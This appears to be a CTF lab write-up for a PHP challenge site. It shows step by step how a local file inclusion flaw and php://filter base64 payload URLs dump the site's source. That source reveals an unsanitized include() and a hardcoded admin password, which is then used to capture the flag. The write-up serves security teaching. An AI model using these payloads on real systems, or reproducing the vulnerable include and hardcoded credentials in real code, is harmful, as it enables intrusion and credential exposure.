Simple Web 0x08(Lab - My First Meow Website)

Posted on | Post modified | In |

Simple Web 0x08(Lab - My First Meow Website)

tags: NTUSTWS CTF Web
  • Challenge: http://h4ck3r.quest:8400/
  • Target: Login as Admin

Background

Exploit

  1. Observe: According to the URL, http://h4ck3r.quest:8400/?page=inc/home, it might have LFI problem.
  2. Use php://filter to read page
    • http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=inc/home

    source code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
     <!DOCTYPE html>
 <html lang="en">

 <head>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Meow</title>
     <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma.min.css">
 </head>

 <body>
     <nav class="navbar is-dark" role="navigation" aria-label="main navigation">
         <div class="navbar-brand">
             <a class="navbar-item" href="/?page=inc/home">🐱</a>
         </div>

         <div id="navbarBasicExample" class="navbar-menu">
             <div class="navbar-start">
                 <a class="navbar-item" href="/?page=inc/home">
                     Home
                 </a>
                 <a class="navbar-item" href="/?page=inc/about">
                     About
                 </a>
                 <a class="navbar-item" href="/admin.php">
                     Admin
                 </a>
             </div>
         </div>
     </nav>

     <div class="container" style="margin-top: 1em;">
         <?php
         if (isset($_GET['page']))
             include($_GET['page'] . ".php");
         else
             include("inc/home.php");
         ?>
     </div>
 </body>

 </html>
  3. Observe page source code: We know that admin.php is under / directory.
    • http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=admin
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
     <h1>Admin Panel</h1>
 <form>
     <input type="text" name="username" value="admin">
     <input type="password" name="password">
     <input type="submit" value="Submit">
 </form>

 <?php
 $admin_account = array("username" => "admin", "password" => "kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ");
 if (
     isset($_GET['username']) && isset($_GET['password']) &&
     $_GET['username'] === $admin_account['username'] && $_GET['password'] === $admin_account['password']
 ) {
     echo "<h1>LOGIN SUCCESS!</h1><p>".getenv('FLAG')."</p>";
 }

 ?>
  4. Then we get admin password is: kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ. Then we got flag!!!